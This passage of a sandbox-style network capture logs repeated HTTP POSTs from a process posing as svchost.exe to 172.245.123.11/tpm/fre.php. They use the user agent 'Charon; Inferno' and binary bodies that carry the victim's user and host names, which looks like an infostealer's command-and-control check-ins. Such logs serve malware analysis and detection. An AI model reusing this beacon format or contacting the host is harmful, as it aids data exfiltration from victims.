                                                              Jan 7, 2025 11:03:16.829443932 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:17.417833090 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:17 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              116192.168.2.550094172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:17.566756010 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:17.571531057 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:18.071057081 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:17 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              117192.168.2.550095172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:18.219871998 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:18.224687099 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:18.730529070 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:18 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              118192.168.2.550096172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:18.876897097 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:18.881699085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:19.380067110 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:19 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              119192.168.2.550097172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:19.518410921 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:19.523284912 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:20.048472881 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:19 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              120192.168.2.550098172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:20.191623926 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:20.196458101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:20.702660084 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:20 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              121192.168.2.550099172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:20.846611977 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:20.851457119 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:21.357232094 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:21 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              122192.168.2.550100172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:21.502944946 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:21.507812977 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:21.997504950 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:21 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              123192.168.2.550101172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:22.167857885 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:22.176021099 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:23.056798935 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:22 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              124192.168.2.550102172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:23.208534956 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:23.213433981 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:24.002123117 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:23 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              125192.168.2.550103172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:24.143870115 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:24.151005030 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:24.672724962 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:24 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              126192.168.2.550104172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:24.819726944 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:24.824518919 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:26.567924023 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:25 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              127192.168.2.550105172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:26.705790043 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:26.710639954 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:27.233051062 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:27 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              128192.168.2.550106172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:27.375411034 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:27.380300045 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:27.880409956 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:27 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              129192.168.2.550107172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:28.010884047 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:28.015736103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:28.538222075 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:28 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              130192.168.2.550108172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:28.698115110 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:28.703037024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:29.206713915 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:29 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              131192.168.2.550109172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:29.344556093 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:29.349451065 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:29.874355078 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:29 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              132192.168.2.550110172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:30.021231890 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:30.026092052 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:30.549503088 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:30 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              133192.168.2.550111172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:30.696604967 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:30.701445103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
